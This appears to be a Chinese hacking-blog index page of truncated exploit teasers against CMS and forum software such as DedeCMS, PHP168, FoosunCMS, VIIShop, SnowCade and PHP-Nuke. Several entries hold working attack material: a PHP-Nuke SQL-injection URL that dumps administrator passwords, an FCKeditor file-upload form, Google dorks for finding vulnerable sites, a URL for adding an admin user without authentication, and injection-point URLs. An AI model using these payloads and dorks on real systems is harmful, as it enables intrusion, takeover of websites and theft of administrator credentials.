BBSGood论坛程序indexlabel.asp和labelsave.asp页面存在SQL注入漏洞

漏洞分析:

阅读全文……

PHP168 V6 下载任意文件漏洞
漏洞文件download.php
漏洞相关文件HASH
b912249a22b630c04f7ad65f8ba5a2f6 download.php

阅读全文……

首先，必须要知道管理员的目录，因为上传只有后台才可以。
在upLoad_bm.asp文件里，首先没有检查来访者的身份。所以可以直接访问
代码如下： 

阅读全文……

DEDECMS网站管理系统plus/carbuyaction.php本地包含漏洞

DedeCms 基于PHP+MySQL的技术开发，支持Windows、Linux、Unix等多种服务器平台，从2004年开始发布第一个版本开始，至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场，目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心，是目前国内应用最广泛的php类CMS系统。

漏洞分析:

阅读全文……

风讯网站管理系统awardAction.asp页面存在SQL注入

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\award\awardAction.asp中：

阅读全文……

VIIShop 网上商店 V1.3.0 Fckeditor 上传漏洞可获取网站的权限。 
测试方法: 
<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackqing.cn/include/fck2/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> 
Upload a new file:<br> 
<input type="file" name="NewFile" size="50"><br> 

阅读全文……

上传文件过滤不严，导致远程文件上传可执行代码漏洞。
批量Google Dork : Copyright 2010. Software Index  

Exp：

阅读全文……

SnowCade v3多处存在SQL注入攻击漏洞，可获取管理员权限
http://127.0.0.1/index.php?action=browse&cat=[注入语句]

http://127.0.0.1/index.php?action=playgame&gameid=[注入语句]

阅读全文……

DedeCmsV5.6 程序plus/carbuyaction.php 变量未初始化，造成本地文件包含漏洞。

代码:

<?php     require_once (dirname(__FILE__) . "/../include/common.inc.php");     define('_PLUS_TPL_', DEDEROOT.'/templets/plus');     require_once DEDEINC.'/dedetemplate.class.php';     require_once DEDEINC.'/shopcar.class.php';    require_once DEDEINC.'/memberlogin.class.php';     if($cfg_mb_open=='N')     {             ShowMsg("系统关闭了会员功能，因此你无法访问此页面！","javascript:;");             exit();     }         $cfg_ml = new MemberLogin();      if(!isset($dopost) || empty($dopost)){   //只要$dopost不为空就行，By：qing。             ...      }elseif($dopost == 'return'){             require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化，           $pay = new $code;             $msg=$pay->respond();             ShowMsg($msg,"javascript:;",0,3000);             exit();      }      ?>   

阅读全文……

网站后台缺少验证可远程添加管理员用户并登录后台
关键字：inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上：admin/User_Manage.asp?action=UserAdd

阅读全文……

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用

HPCMS V6.01存在严重的安全问题

注册一个帐户，进入会员中心。访问http：//www.hackqing.cn/member/buygroup.php?job=buy&gid=3

阅读全文……

PHP-Nuke Module print 6.0 网站程序print&sid存在 SQL注入攻击漏洞，可获取管理员密码权限。

EXp:http://www.hackqing.cn/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--

阅读全文……